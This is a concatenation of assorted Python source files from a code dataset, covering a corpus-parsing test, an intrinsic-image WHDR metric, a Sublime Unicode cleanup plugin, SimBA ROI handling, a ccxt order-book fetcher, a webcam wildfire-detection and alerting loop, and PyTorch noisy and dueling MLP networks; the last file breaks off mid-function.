dataset = data.InMemoryNumpyDataset()
factors = [(1, 0), (3, 2), (4, 4)]
for o1, o2 in factors:
corpora = [
data.MultilingualCorpusConfig(
dialect_id=None,
data_file=self.trg_txt,
dict=self.d,
oversampling=o1,
),
data.MultilingualCorpusConfig(
dialect_id=None,
data_file=self.trg_txt,
dict=self.d,
oversampling=o2,
),
]
dataset.parse_multilingual(corpora)
self.assertEqual((o1 + o2) * self.num_sentences, len(dataset))
def test_parse_multiling(self):
prepend_dataset = data.InMemoryNumpyDataset()
append_dataset = data.InMemoryNumpyDataset()
corpora = [
data.MultilingualCorpusConfig(
dialect_id=10, data_file=self.trg_txt, dict=self.d, oversampling=1
),
data.MultilingualCorpusConfig(
dialect_id=11, data_file=self.trg_txt, dict=self.d, oversampling=1
),
]
lang1 = corpora[0].dialect_id + 1 # +1 for lua
lang2 = corpora[1].dialect_id + 1 # +1 for lua
prepend_dataset.parse_multilingual(
corpora, reverse_order=False, append_eos=False, prepend_language_id=True
)
append_dataset.parse_multilingual(
corpora, reverse_order=False, append_eos=False, prepend_language_id=False
)
self.assertEqual(2 * self.num_sentences, len(prepend_dataset))
self.assertEqual(2 * self.num_sentences, len(append_dataset))
for i in range(self.num_sentences):
self.assertListEqual([lang1] + self.trg_ref[i], prepend_dataset[i].tolist())
self.assertListEqual(self.trg_ref[i] + [lang1], append_dataset[i].tolist())
self.assertListEqual(
[lang2] + self.trg_ref[i],
prepend_dataset[i + self.num_sentences].tolist(),
)
self.assertListEqual(
self.trg_ref[i] + [lang2],
append_dataset[i + self.num_sentences].tolist(),
)
| 2.453125 | 2 |
CompareWHDR.py | Z7Gao/InverseRenderingOfIndoorScene | 171 | 11038 | <filename>CompareWHDR.py
import numpy as np
import sys
import json
import glob
import os.path as osp
import cv2
def compute_whdr(reflectance, judgements, delta=0.1):
points = judgements['intrinsic_points']
comparisons = judgements['intrinsic_comparisons']
id_to_points = {p['id']: p for p in points}
rows, cols = reflectance.shape[0:2]
error_sum = 0.0
error_equal_sum = 0.0
error_inequal_sum = 0.0
weight_sum = 0.0
weight_equal_sum = 0.0
weight_inequal_sum = 0.0
for c in comparisons:
# "darker" is "J_i" in our paper
darker = c['darker']
if darker not in ('1', '2', 'E'):
continue
# "darker_score" is "w_i" in our paper
weight = c['darker_score']
if weight <= 0.0 or weight is None:
continue
point1 = id_to_points[c['point1']]
point2 = id_to_points[c['point2']]
if not point1['opaque'] or not point2['opaque']:
continue
        # convert to grayscale (mean over channels) and clamp away from zero
l1 = max(1e-10, np.mean(reflectance[int(point1['y'] * rows), int(point1['x'] * cols), ...]))
l2 = max(1e-10, np.mean(reflectance[int(point2['y'] * rows), int(point2['x'] * cols), ...]))
# convert algorithm value to the same units as human judgements
if l2 / l1 > 1.0 + delta:
alg_darker = '1'
elif l1 / l2 > 1.0 + delta:
alg_darker = '2'
else:
alg_darker = 'E'
if darker == 'E':
if darker != alg_darker:
error_equal_sum += weight
weight_equal_sum += weight
else:
if darker != alg_darker:
error_inequal_sum += weight
weight_inequal_sum += weight
if darker != alg_darker:
error_sum += weight
weight_sum += weight
if weight_sum:
return (error_sum / weight_sum), error_equal_sum/( weight_equal_sum + 1e-10), error_inequal_sum/(weight_inequal_sum + 1e-10)
else:
return None
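# WHDR is the confidence-weighted fraction of human comparisons that the predicted reflectance
# gets wrong: the sum of 'darker_score' weights on mismatches divided by the total weight.
# Minimal single-image sketch (file names are hypothetical):
#   judgements = json.load(open('12345.json'))
#   albedo = cv2.imread('12345_albedoBS1.png').astype(np.float32) / 255.0
#   whdr, whdr_equal, whdr_inequal = compute_whdr(albedo, judgements, delta=0.1)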
#root = './testReal_cascade0_black_height120_width160/cascade0/iiw/'
root = 'IIW_cascade1/results_brdf2_brdf1/'
rootGt = '/home/zhl/CVPR20/Resubmission/Dataset/IIW/iiw-dataset/data/'
suffix = 'albedoBS1.png'
count = 0.0
whdr_sum = 0.0
whdr_mean = 0.0
img_list = glob.glob(osp.join(root, '*_%s' % suffix ) )
for img_path in img_list:
#load CGI precomputed file
judgement_path = osp.join(rootGt, img_path.split('/')[-1].split('_')[0] + '.json' )
judgements = json.load(open(judgement_path) )
count+=1.0
ourR = cv2.imread(img_path ).astype(np.float32 ) / 255.0
whdr, _, _ = compute_whdr(ourR, judgements )
whdr_sum += whdr
print('img_path: {0}, whdr: current {1} average {2}'.
format(img_path.split('/')[-1].split('_')[0], whdr, whdr_sum / count ) )
whdr_mean = whdr_sum / count
print('whdr ours: {0}'.format(whdr_mean ) )
| 2.78125 | 3 |
theonionbox/stamp.py | ralphwetzel/theonionbox | 120 | 11039 | __title__ = 'The Onion Box'
__description__ = 'Dashboard to monitor Tor node operations.'
__version__ = '20.2'
__stamp__ = '20200119|095654'
| 0.824219 | 1 |
UnicodeTraps.py | loamhoof/sublime-plugins-dump | 0 | 11040 | import re
from sublime import Region
import sublime_plugin
REPLACEMENTS = {
'\u00a0': ' ', # no-break space
'\u200b': '', # zero-width space
}
class UnicodeTrapsListener(sublime_plugin.EventListener):
@staticmethod
def on_pre_save(view):
view.run_command('unicode_traps')
class UnicodeTraps(sublime_plugin.TextCommand):
def run(self, edit):
all_file = self.view.substr(Region(0, self.view.size()))
matches = list(re.finditer('[%s]' % ''.join(REPLACEMENTS), all_file))
for match in reversed(matches):
self.view.replace(edit, Region(*match.span()), REPLACEMENTS[match.group()])
| 2.59375 | 3 |
simba/ROI_multiply.py | KonradDanielewski/simba | 172 | 11041 | <filename>simba/ROI_multiply.py
import glob
import pandas as pd
from configparser import ConfigParser
import os
from simba.drop_bp_cords import *
def multiplyFreeHand(inifile, currVid):
_, CurrVidName, ext = get_fn_ext(currVid)
config = ConfigParser()
configFile = str(inifile)
config.read(configFile)
projectPath = config.get('General settings', 'project_path')
videoPath = os.path.join(projectPath, 'videos')
ROIcoordinatesPath = os.path.join(projectPath, 'logs', 'measures', 'ROI_definitions.h5')
try:
rectanglesInfo = pd.read_hdf(ROIcoordinatesPath, key='rectangles')
circleInfo = pd.read_hdf(ROIcoordinatesPath, key='circleDf')
polygonInfo = pd.read_hdf(ROIcoordinatesPath, key='polygons')
rectangularDf = rectanglesInfo.loc[rectanglesInfo['Video'] == str(CurrVidName)]
circleDf = circleInfo.loc[circleInfo['Video'] == str(CurrVidName)]
polygonDf = polygonInfo.loc[polygonInfo['Video'] == str(CurrVidName)]
ROIdefExist = True
except FileNotFoundError:
ROIdefExist = False
        print('Cannot apply to all: no ROI definitions exist')
if ROIdefExist is True:
if (len(rectangularDf) == 0 and len(circleDf) == 0 and len(polygonDf) == 0):
print('Cannot apply ROIs to all: no records exist for ' + str(CurrVidName))
else:
videofilesFound = glob.glob(videoPath + '/*.mp4') + glob.glob(videoPath + '/*.avi')
duplicatedRec, duplicatedCirc, duplicatedPoly = (rectangularDf.copy(), circleDf.copy(), polygonDf.copy())
for vids in videofilesFound:
_, CurrVidName, ext = get_fn_ext(vids)
duplicatedRec['Video'], duplicatedCirc['Video'], duplicatedPoly['Video'] = (CurrVidName, CurrVidName, CurrVidName)
rectangularDf = rectangularDf.append(duplicatedRec, ignore_index=True)
circleDf = circleDf.append(duplicatedCirc, ignore_index=True)
polygonDf = polygonDf.append(duplicatedPoly, ignore_index=True)
rectangularDf = rectangularDf.drop_duplicates(subset=['Video', 'Name'], keep="first")
circleDf = circleDf.drop_duplicates(subset=['Video', 'Name'], keep="first")
polygonDf = polygonDf.drop_duplicates(subset=['Video', 'Name'], keep="first")
store = pd.HDFStore(ROIcoordinatesPath, mode='w')
store['rectangles'] = rectangularDf
store['circleDf'] = circleDf
store['polygons'] = polygonDf
store.close()
print('ROI(s) for ' + CurrVidName + ' applied to all videos')
print('Next, click on "draw" to modify ROI location(s) or click on "reset" to remove ROI drawing(s)')
| 2.484375 | 2 |
src/utils/ccxt/fetch_order_book.py | YasunoriMATSUOKA/crypto-asset-easy-management | 0 | 11042 | <filename>src/utils/ccxt/fetch_order_book.py
from logging import getLogger
import traceback
from .get_public_exchange import get_public_exchange
logger = getLogger("__main__").getChild(__name__)
def fetch_order_book(exchange_name, pair):
logger.debug("start")
logger.debug(exchange_name)
logger.debug(pair)
exchange = get_public_exchange(exchange_name)
try:
logger.debug("try")
order_book = exchange.fetch_order_book(pair)
logger.info("success")
except Exception as error:
logger.warning("failure")
logger.warning(error)
logger.debug(traceback.format_exc())
order_book = None
logger.debug(order_book)
logger.debug("end")
return order_book
| 2.53125 | 3 |
smoke-classifier/detect_fire.py | agnes-yang/firecam | 10 | 11043 | <reponame>agnes-yang/firecam<gh_stars>1-10
# Copyright 2018 The Fuego Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
@author: <NAME>
This is the main code for reading images from webcams and detecting fires
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
fuegoRoot = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, os.path.join(fuegoRoot, 'lib'))
sys.path.insert(0, fuegoRoot)
import settings
settings.fuegoRoot = fuegoRoot
import collect_args
import rect_to_squares
import goog_helper
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # quiet down tensorflow logging (must be done before tf_helper)
import tf_helper
import db_manager
import email_helper
import sms_helper
import img_archive
from detection_policies import policies
import logging
import pathlib
import tempfile
import shutil
import time, datetime, dateutil.parser
import random
import re
import hashlib
from urllib.request import urlretrieve
import tensorflow as tf
from PIL import Image, ImageFile, ImageDraw, ImageFont
ImageFile.LOAD_TRUNCATED_IMAGES = True
def getNextImage(dbManager, cameras, cameraID=None):
"""Gets the next image to check for smoke
Uses a shared counter being updated by all cooperating detection processes
to index into the list of cameras to download the image to a local
temporary directory
Args:
dbManager (DbManager):
cameras (list): list of cameras
cameraID (str): optional specific camera to get image from
Returns:
Tuple containing camera name, current timestamp, and filepath of the image
"""
if getNextImage.tmpDir == None:
getNextImage.tmpDir = tempfile.TemporaryDirectory()
logging.warning('TempDir %s', getNextImage.tmpDir.name)
if cameraID:
camera = list(filter(lambda x: x['name'] == cameraID, cameras))[0]
else:
index = dbManager.getNextSourcesCounter() % len(cameras)
camera = cameras[index]
timestamp = int(time.time())
imgPath = img_archive.getImgPath(getNextImage.tmpDir.name, camera['name'], timestamp)
# logging.warning('urlr %s %s', camera['url'], imgPath)
try:
urlretrieve(camera['url'], imgPath)
except Exception as e:
logging.error('Error fetching image from %s %s', camera['name'], str(e))
return getNextImage(dbManager, cameras)
md5 = hashlib.md5(open(imgPath, 'rb').read()).hexdigest()
if ('md5' in camera) and (camera['md5'] == md5) and not cameraID:
logging.warning('Camera %s image unchanged', camera['name'])
# skip to next camera
return getNextImage(dbManager, cameras)
camera['md5'] = md5
return (camera['name'], timestamp, imgPath, md5)
getNextImage.tmpDir = None
# XXXXX Use a fixed stable directory for testing
# from collections import namedtuple
# Tdir = namedtuple('Tdir', ['name'])
# getNextImage.tmpDir = Tdir('c:/tmp/dftest')
def getNextImageFromDir(imgDirectory):
"""Gets the next image to check for smoke from given directory
    A variant of getNextImage() above, but works with files already present
    on the local filesystem.
Args:
imgDirectory (str): directory containing the files
Returns:
Tuple containing camera name, current timestamp, and filepath of the image
"""
if getNextImageFromDir.tmpDir == None:
getNextImageFromDir.tmpDir = tempfile.TemporaryDirectory()
logging.warning('TempDir %s', getNextImageFromDir.tmpDir.name)
if not getNextImageFromDir.files:
allFiles = os.listdir(imgDirectory)
# filter out files with _Score suffix because they contain annotated scores
# generated by drawFireBox() function below.
getNextImageFromDir.files = list(filter(lambda x: '_Score.jpg' not in x, allFiles))
getNextImageFromDir.index += 1
if getNextImageFromDir.index < len(getNextImageFromDir.files):
fileName = getNextImageFromDir.files[getNextImageFromDir.index]
origPath = os.path.join(imgDirectory, fileName)
destPath = os.path.join(getNextImageFromDir.tmpDir.name, fileName)
shutil.copyfile(origPath, destPath)
parsed = img_archive.parseFilename(fileName)
if not parsed:
# failed to parse, so skip to next image
return getNextImageFromDir(imgDirectory)
md5 = hashlib.md5(open(destPath, 'rb').read()).hexdigest()
return (parsed['cameraID'], parsed['unixTime'], destPath, md5)
logging.warning('Finished processing all images in directory. Exiting')
exit(0)
getNextImageFromDir.files = None
getNextImageFromDir.index = -1
getNextImageFromDir.tmpDir = None
def checkAndUpdateAlerts(dbManager, camera, timestamp, driveFileIDs):
"""Check if alert has been recently sent out for given camera
Args:
dbManager (DbManager):
camera (str): camera name
timestamp (int):
driveFileIDs (list): List of Google drive IDs for the uploaded image files
Returns:
True if this is a new alert, False otherwise
"""
# Only alert if there has not been a detection in the last hour. This prevents spam
# from long lasting fires.
sqlTemplate = """SELECT * FROM detections
where CameraName='%s' and timestamp > %s and timestamp < %s"""
sqlStr = sqlTemplate % (camera, timestamp - 60*60, timestamp)
dbResult = dbManager.query(sqlStr)
if len(dbResult) > 0:
        logging.warning('Suppressing new alert due to recent detection')
return False
dbRow = {
'CameraName': camera,
'Timestamp': timestamp,
'ImageID': driveFileIDs[0] if driveFileIDs else ''
}
dbManager.add_data('alerts', dbRow)
return True
def alertFire(constants, cameraID, imgPath, annotatedFile, driveFileIDs, fireSegment, timestamp):
"""Send alerts about given fire through all channels (currently email and sms)
Args:
constants (dict): "global" contants
cameraID (str): camera name
imgPath: filepath of the original image
annotatedFile: filepath of the annotated image
driveFileIDs (list): List of Google drive IDs for the uploaded image files
fireSegment (dictionary): dictionary with information for the segment with fire/smoke
timestamp (int): time.time() value when image was taken
"""
emailFireNotification(constants, cameraID, imgPath, annotatedFile, driveFileIDs, fireSegment, timestamp)
smsFireNotification(constants['dbManager'], cameraID)
def emailFireNotification(constants, cameraID, imgPath, annotatedFile, driveFileIDs, fireSegment, timestamp):
"""Send an email alert for a potential new fire
    Send email with information about the camera and fire score including
    image attachments
Args:
constants (dict): "global" contants
cameraID (str): camera name
imgPath: filepath of the original image
annotatedFile: filepath of the annotated image
driveFileIDs (list): List of Google drive IDs for the uploaded image files
fireSegment (dictionary): dictionary with information for the segment with fire/smoke
timestamp (int): time.time() value when image was taken
"""
dbManager = constants['dbManager']
subject = 'Possible (%d%%) fire in camera %s' % (int(fireSegment['score']*100), cameraID)
body = 'Please check the attached images for fire.'
# commenting out links to google drive because they appear as extra attachments causing confusion
# and some email recipients don't even have permissions to access drive.
# for driveFileID in driveFileIDs:
# driveTempl = '\nAlso available from google drive as https://drive.google.com/file/d/%s'
# driveBody = driveTempl % driveFileID
# body += driveBody
# emails are sent from settings.fuegoEmail and bcc to everyone with active emails in notifications SQL table
dbResult = dbManager.getNotifications(filterActiveEmail = True)
emails = [x['email'] for x in dbResult]
if len(emails) > 0:
# attach images spanning a few minutes so reviewers can evaluate based on progression
startTimeDT = datetime.datetime.fromtimestamp(timestamp - 3*60)
endTimeDT = datetime.datetime.fromtimestamp(timestamp - 1*60)
with tempfile.TemporaryDirectory() as tmpDirName:
oldImages = img_archive.getHpwrenImages(constants['googleServices'], settings, tmpDirName,
constants['camArchives'], cameraID, startTimeDT, endTimeDT, 1)
attachments = oldImages or []
attachments.append(imgPath)
if annotatedFile:
attachments.append(annotatedFile)
email_helper.sendEmail(constants['googleServices']['mail'], settings.fuegoEmail, emails, subject, body, attachments)
def smsFireNotification(dbManager, cameraID):
"""Send an sms (phone text message) alert for a potential new fire
Args:
dbManager (DbManager):
cameraID (str): camera name
"""
message = 'Fuego fire notification in camera %s. Please check email for details' % cameraID
dbResult = dbManager.getNotifications(filterActivePhone = True)
phones = [x['phone'] for x in dbResult]
if len(phones) > 0:
for phone in phones:
sms_helper.sendSms(settings, phone, message)
def deleteImageFiles(imgPath, origImgPath, annotatedFile):
"""Delete all image files given in segments
    Args:
        imgPath: filepath of the image used for classification
        origImgPath: filepath of the original image
        annotatedFile: filepath of the annotated image
"""
os.remove(imgPath)
if imgPath != origImgPath:
os.remove(origImgPath)
if annotatedFile:
os.remove(annotatedFile)
ppath = pathlib.PurePath(imgPath)
# leftoverFiles = os.listdir(str(ppath.parent))
# if len(leftoverFiles) > 0:
# logging.warning('leftover files %s', str(leftoverFiles))
def getLastScoreCamera(dbManager):
sqlStr = "SELECT CameraName from scores order by Timestamp desc limit 1;"
dbResult = dbManager.query(sqlStr)
if len(dbResult) > 0:
return dbResult[0]['CameraName']
return None
def heartBeat(filename):
"""Inform monitor process that this detection process is alive
Informs by updating the timestamp on given file
Args:
filename (str): file path of file used for heartbeating
"""
pathlib.Path(filename).touch()
def genDiffImage(imgPath, earlierImgPath, minusMinutes):
"""Subtract the two given images and store result in new difference image file
Args:
imgPath (str): filepath of the current image (to subtract from)
        earlierImgPath (str): filepath of the earlier image (value to subtract)
minusMinutes (int): number of minutes separating subtracted images
Returns:
file path to the difference image
"""
imgA = Image.open(imgPath)
imgB = Image.open(earlierImgPath)
imgDiff = img_archive.diffImages(imgA, imgB)
parsedName = img_archive.parseFilename(imgPath)
parsedName['diffMinutes'] = minusMinutes
imgDiffName = img_archive.repackFileName(parsedName)
ppath = pathlib.PurePath(imgPath)
imgDiffPath = os.path.join(str(ppath.parent), imgDiffName)
imgDiff.save(imgDiffPath, format='JPEG')
return imgDiffPath
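# Illustrative call (paths are placeholders): subtract the frame captured minusMinutes earlier
# from the current frame so that, in diff mode, the classifier only sees recent changes.
#   diffImgPath = genDiffImage(currentImgPath, earlierImgPath, minusMinutes=5)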
def updateTimeTracker(timeTracker, processingTime):
"""Update the time tracker data with given time to process current image
    If enough new samples have been recorded, resets the history and
    updates the average timePerSample
Args:
timeTracker (dict): tracks recent image processing times
processingTime (float): number of seconds needed to process current image
"""
timeTracker['totalTime'] += processingTime
timeTracker['numSamples'] += 1
# after N samples, update the rate to adapt to current conditions
# N = 50 should be big enough to be stable yet small enough to adapt
if timeTracker['numSamples'] > 50:
timeTracker['timePerSample'] = timeTracker['totalTime'] / timeTracker['numSamples']
timeTracker['totalTime'] = 0
timeTracker['numSamples'] = 0
logging.warning('New timePerSample %.2f', timeTracker['timePerSample'])
def initializeTimeTracker():
"""Initialize the time tracker
Returns:
timeTracker (dict):
"""
return {
'totalTime': 0.0,
'numSamples': 0,
'timePerSample': 3 # start off with estimate of 3 seconds per camera
}
def getArchivedImages(constants, cameras, startTimeDT, timeRangeSeconds, minusMinutes):
"""Get random images from HPWREN archive matching given constraints and optionally subtract them
Args:
constants (dict): "global" contants
cameras (list): list of cameras
startTimeDT (datetime): starting time of time range
timeRangeSeconds (int): number of seconds in time range
        minusMinutes (int): number of desired minutes between images to subtract
Returns:
Tuple containing camera name, current timestamp, filepath of regular image, and filepath of difference image
"""
if getArchivedImages.tmpDir == None:
getArchivedImages.tmpDir = tempfile.TemporaryDirectory()
logging.warning('TempDir %s', getArchivedImages.tmpDir.name)
cameraID = cameras[int(len(cameras)*random.random())]['name']
timeDT = startTimeDT + datetime.timedelta(seconds = random.random()*timeRangeSeconds)
if minusMinutes:
prevTimeDT = timeDT + datetime.timedelta(seconds = -60 * minusMinutes)
else:
prevTimeDT = timeDT
files = img_archive.getHpwrenImages(constants['googleServices'], settings, getArchivedImages.tmpDir.name,
constants['camArchives'], cameraID, prevTimeDT, timeDT, minusMinutes or 1)
# logging.warning('files %s', str(files))
if not files:
return (None, None, None, None)
if minusMinutes:
if len(files) > 1:
if files[0] >= files[1]: # files[0] is supposed to be earlier than files[1]
logging.warning('unexpected file order %s', str(files))
for file in files:
os.remove(file)
return (None, None, None, None)
imgDiffPath = genDiffImage(files[1], files[0], minusMinutes)
os.remove(files[0]) # no longer needed
parsedName = img_archive.parseFilename(files[1])
return (cameraID, parsedName['unixTime'], files[1], imgDiffPath)
else:
logging.warning('unexpected file count %s', str(files))
for file in files:
os.remove(file)
return (None, None, None, None)
elif len(files) > 0:
parsedName = img_archive.parseFilename(files[0])
return (cameraID, parsedName['unixTime'], files[0], files[0])
return (None, None, None, None)
getArchivedImages.tmpDir = None
def main():
optArgs = [
["b", "heartbeat", "filename used for heartbeating check"],
["c", "collectPositves", "collect positive segments for training data"],
["d", "imgDirectory", "Name of the directory containing the images"],
["t", "time", "Time breakdown for processing images"],
["m", "minusMinutes", "(optional) subtract images from given number of minutes ago"],
["r", "restrictType", "Only process images from cameras of given type"],
["s", "startTime", "(optional) performs search with modifiedTime > startTime"],
["e", "endTime", "(optional) performs search with modifiedTime < endTime"],
]
args = collect_args.collectArgs([], optionalArgs=optArgs, parentParsers=[goog_helper.getParentParser()])
minusMinutes = int(args.minusMinutes) if args.minusMinutes else 0
googleServices = goog_helper.getGoogleServices(settings, args)
dbManager = db_manager.DbManager(sqliteFile=settings.db_file,
psqlHost=settings.psqlHost, psqlDb=settings.psqlDb,
psqlUser=settings.psqlUser, psqlPasswd=settings.psqlPasswd)
tfConfig = tf.ConfigProto()
tfConfig.gpu_options.per_process_gpu_memory_fraction = 0.1 #hopefully reduces segfaults
cameras = dbManager.get_sources(activeOnly=True, restrictType=args.restrictType)
startTimeDT = dateutil.parser.parse(args.startTime) if args.startTime else None
endTimeDT = dateutil.parser.parse(args.endTime) if args.endTime else None
timeRangeSeconds = None
useArchivedImages = False
camArchives = img_archive.getHpwrenCameraArchives(googleServices['sheet'], settings)
DetectionPolicyClass = policies.get_policies()[settings.detectionPolicy]
detectionPolicy = DetectionPolicyClass(settings, args, googleServices, dbManager, tfConfig, camArchives, minusMinutes, useArchivedImages)
constants = { # dictionary of constants to reduce parameters in various functions
'args': args,
'googleServices': googleServices,
'camArchives': camArchives,
'dbManager': dbManager,
}
if startTimeDT or endTimeDT:
assert startTimeDT and endTimeDT
timeRangeSeconds = (endTimeDT-startTimeDT).total_seconds()
assert timeRangeSeconds > 0
assert args.collectPositves
useArchivedImages = True
random.seed(0) # fixed seed guarantees same randomized ordering. Should make this optional argument in future
processingTimeTracker = initializeTimeTracker()
while True:
classifyImgPath = None
timeStart = time.time()
if useArchivedImages:
(cameraID, timestamp, imgPath, classifyImgPath) = \
getArchivedImages(constants, cameras, startTimeDT, timeRangeSeconds, minusMinutes)
# elif minusMinutes: to be resurrected using archive functionality
# elif args.imgDirectory: unused functionality -- to delete?
# (cameraID, timestamp, imgPath, md5) = getNextImageFromDir(args.imgDirectory)
else: # regular (non diff mode), grab image and process
(cameraID, timestamp, imgPath, md5) = getNextImage(dbManager, cameras)
classifyImgPath = imgPath
if not cameraID:
continue # skip to next camera
timeFetch = time.time()
image_spec = [{}]
image_spec[-1]['path'] = classifyImgPath
image_spec[-1]['timestamp'] = timestamp
image_spec[-1]['cameraID'] = cameraID
detectionResult = detectionPolicy.detect(image_spec)
timeDetect = time.time()
if detectionResult['fireSegment']:
if checkAndUpdateAlerts(dbManager, cameraID, timestamp, detectionResult['driveFileIDs']):
alertFire(constants, cameraID, imgPath, detectionResult['annotatedFile'], detectionResult['driveFileIDs'], detectionResult['fireSegment'], timestamp)
deleteImageFiles(imgPath, imgPath, detectionResult['annotatedFile'])
if (args.heartbeat):
heartBeat(args.heartbeat)
timePost = time.time()
updateTimeTracker(processingTimeTracker, timePost - timeStart)
if args.time:
if not detectionResult['timeMid']:
detectionResult['timeMid'] = timeDetect
logging.warning('Timings: fetch=%.2f, detect0=%.2f, detect1=%.2f post=%.2f',
timeFetch-timeStart, detectionResult['timeMid']-timeFetch, timeDetect-detectionResult['timeMid'], timePost-timeDetect)
if __name__=="__main__":
main()
| 1.820313 | 2 |
torch_agents/cogment_verse_torch_agents/third_party/hive/mlp.py | kharyal/cogment-verse | 0 | 11044 | import math
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn
class SimpleMLP(nn.Module):
"""Simple MLP function approximator for Q-Learning."""
def __init__(self, in_dim, out_dim, hidden_units=256, num_hidden_layers=1):
super().__init__()
self.input_layer = nn.Sequential(nn.Linear(in_dim, hidden_units), nn.ReLU())
self.hidden_layers = nn.Sequential(
*[nn.Sequential(nn.Linear(hidden_units, hidden_units), nn.ReLU()) for _ in range(num_hidden_layers - 1)]
)
self.output_layer = nn.Linear(hidden_units, out_dim)
def forward(self, x):
x = self.input_layer(x)
x = self.hidden_layers(x)
return self.output_layer(x)
class NoisyLinear(nn.Module):
"""NoisyLinear Layer"""
def __init__(self, in_dim, out_dim, std_init=0.4):
super(NoisyLinear, self).__init__()
self.in_features = in_dim
self.out_features = out_dim
self.std_init = std_init
self.weight_mu = nn.Parameter(torch.empty(out_dim, in_dim))
self.weight_sigma = nn.Parameter(torch.empty(out_dim, in_dim))
self.register_buffer("weight_epsilon", torch.empty(out_dim, in_dim))
self.bias_mu = nn.Parameter(torch.empty(out_dim))
self.bias_sigma = nn.Parameter(torch.empty(out_dim))
self.register_buffer("bias_epsilon", torch.empty(out_dim))
self.reset_parameters()
self.sample_noise()
def reset_parameters(self):
mu_range = 1.0 / math.sqrt(self.in_features)
self.weight_mu.data.uniform_(-mu_range, mu_range)
self.weight_sigma.data.fill_(self.std_init / math.sqrt(self.in_features))
self.bias_mu.data.uniform_(-mu_range, mu_range)
self.bias_sigma.data.fill_(self.std_init / math.sqrt(self.out_features))
def _scale_noise(self, size):
x = torch.randn(size)
return x.sign().mul_(x.abs().sqrt_())
def sample_noise(self):
epsilon_in = self._scale_noise(self.in_features)
epsilon_out = self._scale_noise(self.out_features)
weight_eps = epsilon_out.ger(epsilon_in)
bias_eps = epsilon_out
return weight_eps, bias_eps
def forward(self, inp):
if self.training:
weight_eps, bias_eps = self.sample_noise()
return F.linear(
inp,
self.weight_mu + self.weight_sigma * weight_eps,
self.bias_mu + self.bias_sigma * bias_eps,
)
else:
return F.linear(inp, self.weight_mu, self.bias_mu)
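# NoisyLinear above uses factorized Gaussian noise ("Noisy Networks for Exploration"):
# f(x) = sign(x) * sqrt(|x|), eps_W = f(eps_out) outer f(eps_in), eps_b = f(eps_out), so only
# in_features + out_features noise values are drawn per forward pass while training.
# Minimal usage sketch (sizes are arbitrary):
#   layer = NoisyLinear(in_dim=4, out_dim=2)
#   layer.train(); y_noisy = layer(torch.randn(8, 4))  # fresh noise sampled inside forward()
#   layer.eval();  y_mean = layer(torch.randn(8, 4))   # deterministic mean weights only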
class ComplexMLP(nn.Module):
"""MLP function approximator for Q-Learning."""
def __init__(
self,
in_dim,
out_dim,
hidden_units=256,
num_hidden_layers=1,
noisy=False,
dueling=False,
sigma_init=0.5,
atoms=1,
):
super().__init__()
self._noisy = noisy
self._dueling = dueling
self._sigma_init = sigma_init
self._in_dim = np.prod(in_dim)
self._hidden_units = hidden_units
if self._dueling:
num_hidden_layers = max(num_hidden_layers - 1, 2)
self._num_hidden_layers = num_hidden_layers
self._out_dim = out_dim
self._atoms = atoms
self.init_networks()
def init_networks(self):
if self._noisy:
self.input_layer = nn.Sequential(
NoisyLinear(self._in_dim, self._hidden_units, self._sigma_init),
nn.ReLU(),
)
self.hidden_layers = nn.Sequential(
*[
nn.Sequential(
NoisyLinear(self._hidden_units, self._hidden_units, self._sigma_init),
nn.ReLU(),
)
for _ in range(self._num_hidden_layers - 1)
]
)
else:
self.input_layer = nn.Sequential(nn.Linear(self._in_dim, self._hidden_units), nn.ReLU())
self.hidden_layers = nn.Sequential(
*[
nn.Sequential(nn.Linear(self._hidden_units, self._hidden_units), nn.ReLU())
for _ in range(self._num_hidden_layers - 1)
]
)
if self._dueling:
"""In dueling, we have two heads - one for estimating advantage function and one for
estimating value function. If `noisy` is also true, then each of these layers will
be NoisyLinear()"""
if self._noisy:
self.output_layer_adv = nn.Sequential(
NoisyLinear(self._hidden_units, self._hidden_units, self._sigma_init),
nn.ReLU(),
NoisyLinear(
self._hidden_units,
self._out_dim * self._atoms,
self._sigma_init,
),
)
self.output_layer_val = nn.Sequential(
NoisyLinear(self._hidden_units, self._hidden_units, self._sigma_init),
nn.ReLU(),
NoisyLinear(
self._hidden_units,
1 * self._atoms,
self._sigma_init,
),
)
else:
                self.output_layer_adv = nn.Sequential(
                    nn.Linear(self._hidden_units, self._hidden_units),
                    nn.ReLU(),
                    nn.Linear(
                        self._hidden_units,
                        self._out_dim * self._atoms,
                    ),
                )
                self.output_layer_val = nn.Sequential(
                    nn.Linear(self._hidden_units, self._hidden_units),
                    nn.ReLU(),
                    nn.Linear(
                        self._hidden_units,
                        1 * self._atoms,
                    ),
                )
else:
if self._noisy:
self.output_layer = NoisyLinear(self._hidden_units, self._out_dim * self._atoms, self._sigma_init)
else:
self.output_layer = nn.Linear(self._hidden_units, self._out_dim * self._atoms)
def forward(self, x):
x = torch.flatten(x, start_dim=1)
x = self.input_layer(x)
x = self.hidden_layers(x)
if self._dueling:
adv = self.output_layer_adv(x)
val = self.output_layer_val(x)
if len(adv.shape) == 1:
x = val + adv - adv.mean(0)
else:
x = val + adv - adv.mean(1).unsqueeze(1).expand(x.shape[0], self._out_dim)
else:
x = self.output_layer(x)
return x
class DistributionalMLP(ComplexMLP):
"""Distributional MLP function approximator for Q-Learning."""
def __init__(
self,
in_dim,
out_dim,
supports,
hidden_units=256,
num_hidden_layers=1,
noisy=True,
dueling=True,
sigma_init=0.5,
atoms=51,
):
super().__init__(
in_dim,
out_dim,
hidden_units,
num_hidden_layers,
noisy,
dueling,
sigma_init,
atoms,
)
self._supports = supports
def forward(self, x):
x = torch.flatten(x, start_dim=1)
x = self.dist(x)
x = torch.sum(x * self._supports, dim=2)
return x
def dist(self, x):
x = self.input_layer(x)
x = self.hidden_layers(x)
if self._dueling:
adv = self.output_layer_adv(x)
adv = adv.view(-1, self._out_dim, self._atoms)
val = self.output_layer_val(x)
val = val.view(-1, 1, self._atoms)
x = val + adv - adv.mean(dim=1, keepdim=True)
else:
